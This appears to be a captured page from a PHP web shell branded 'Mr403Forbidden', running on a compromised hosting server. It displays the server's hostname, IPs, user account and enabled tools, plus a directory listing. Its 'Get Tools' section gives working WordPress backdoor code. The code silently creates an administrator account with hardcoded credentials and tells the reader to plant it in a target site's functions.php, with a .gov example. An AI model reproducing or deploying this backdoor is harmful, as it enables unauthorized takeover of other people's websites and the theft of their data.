./Mr403Forbidden

:/usr/include/sepol/ [ s--------- ]

System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software: LiteSpeed
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 194.163.174.55
Your IP: 216.73.216.138
User: business1 (1088) | Group: business1 (1091)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
mail

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
cil dir 2024-01-26 6:50 - root/root s---------
policydb dir 2024-01-26 6:50 - root/root s---------
boolean_record.h file 2021-10-09 2:44 1.51 KB root/root s---------
booleans.h file 2021-10-09 2:44 2.19 KB root/root s---------
context.h file 2021-10-09 2:44 752 B root/root s---------
context_record.h file 2021-10-09 2:44 1.63 KB root/root s---------
debug.h file 2021-10-09 2:44 975 B root/root s---------
errcodes.h file 2021-10-09 2:44 851 B root/root s---------
handle.h file 2021-10-09 2:44 1.36 KB root/root s---------
ibendport_record.h file 2021-10-09 2:44 2.13 KB root/root s---------
ibendports.h file 2021-10-09 2:44 1.35 KB root/root s---------
ibpkey_record.h file 2021-10-09 2:44 2.25 KB root/root s---------
ibpkeys.h file 2021-10-09 2:44 1.32 KB root/root s---------
iface_record.h file 2021-10-09 2:44 1.8 KB root/root s---------
interfaces.h file 2021-10-09 2:44 1.37 KB root/root s---------
kernel_to_cil.h file 2021-10-09 2:44 125 B root/root s---------
kernel_to_conf.h file 2021-10-09 2:44 126 B root/root s---------
module.h file 2021-10-09 2:44 2.62 KB root/root s---------
module_to_cil.h file 2021-10-09 2:44 329 B root/root s---------
node_record.h file 2021-10-09 2:44 2.74 KB root/root s---------
nodes.h file 2021-10-09 2:44 1.28 KB root/root s---------
policydb.h file 2021-10-09 2:44 4.58 KB root/root s---------
port_record.h file 2021-10-09 2:44 1.97 KB root/root s---------
ports.h file 2021-10-09 2:44 1.28 KB root/root s---------
roles.h file 2021-10-09 2:44 339 B root/root s---------
sepol.h file 2021-10-09 2:44 862 B root/root s---------
user_record.h file 2021-10-09 2:44 2.33 KB root/root s---------
users.h file 2021-10-09 2:44 1.98 KB root/root s---------

© ./Mr403Forbidden